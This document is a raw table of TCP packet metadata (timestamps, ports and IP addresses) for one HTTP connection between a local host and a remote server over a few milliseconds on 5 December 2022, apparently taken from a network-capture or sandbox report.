Dec 5, 2022 01:32:37.824877977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824893951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824909925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824918032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824939966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824961901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824975967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824985027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825000048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825009108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825031042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825053930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825064898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825078011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825102091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825124979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825129986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825148106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825150013 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825170994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825192928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825210094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825217962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825232029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825241089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825264931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825283051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825287104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825315952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825330019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825337887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825360060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825382948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825404882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825407028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825423956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825429916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825453043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825475931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825495005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825499058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825510979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825521946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825544119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825567007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825586081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825588942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825613976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825753927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825814962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825855970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825875044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825897932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825903893 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.825941086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.825982094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826021910 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826024055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826066017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826082945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826108932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826150894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826163054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826193094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826234102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826245070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826277971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826319933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826322079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826361895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826401949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826442003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826446056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826483011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826483965 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826524019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826565027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826606035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826608896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826646090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826649904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826687098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826726913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826766968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826775074 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826807976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826807976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.826849937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826916933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826958895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.826972961 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827001095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827006102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827042103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827080965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827124119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827132940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827163935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827171087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827207088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827246904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827287912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827294111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827331066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827331066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827373981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827414036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827454090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827460051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827495098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827496052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827536106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827577114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827598095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827620029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827661991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827701092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827707052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827743053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827747107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827783108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827822924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827845097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827864885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827905893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827912092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.827946901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.827989101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828028917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828038931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828069925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828074932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828115940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828155041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828195095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828233957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828274965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828315973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828331947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828331947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828356981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828366041 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828402042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828429937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828442097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828483105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828485012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828525066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828564882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828604937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828614950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828645945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828651905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828685999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828727007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828751087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828768015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828825951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828854084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828874111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828916073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828955889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.828968048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.828996897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829044104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829049110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829085112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829087019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829129934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829169989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829210997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829219103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829252958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829252958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829294920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829334974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829375029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829380035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829415083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829418898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829457998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829498053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829503059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829539061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829581022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829582930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829622030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829663038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829704046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829720974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829744101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829749107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829786062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829827070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829866886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829874992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829910040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829915047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.829950094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.829991102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830032110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830041885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830073118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830076933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830117941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830157995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830163956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830199003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830241919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830249071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830282927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830337048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830379009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830379009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830423117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830456972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830465078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830507994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830512047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830549002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830549955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830589056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830600977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830629110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830631971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830672979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830684900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830714941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830717087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830758095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830758095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830800056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830801964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830842972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830845118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830884933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.830904961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830945969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830985069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.830997944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831026077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831032991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831068039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831073046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831115961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831118107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831156969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831161022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831190109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831206083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831231117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831234932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831271887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831275940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831312895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831316948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831355095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831360102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831396103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831398010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831438065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831439972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831479073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831482887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831517935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831522942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831562996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831564903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831605911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831605911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831645966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831648111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831687927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831691980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831733942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831734896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831777096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831816912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831821918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831856012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831857920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831898928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831899881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831939936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831940889 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.831980944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.831983089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832021952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832022905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832065105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832072973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832109928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832120895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832151890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832153082 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832194090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832197905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832236052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832240105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832277060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832279921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832318068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832329988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832329988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832359076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832393885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832418919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832437038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832456112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832477093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832494020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832518101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832559109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832590103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832590103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832600117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832607985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832643032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832653999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832684040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832684040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832726955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832768917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832777023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832808971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832809925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832850933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832851887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832892895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832894087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832935095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832935095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.832976103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.832983017 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833017111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833024979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833058119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833061934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833103895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833105087 CET	49705	80	192.168.2.3	66.235.200.147
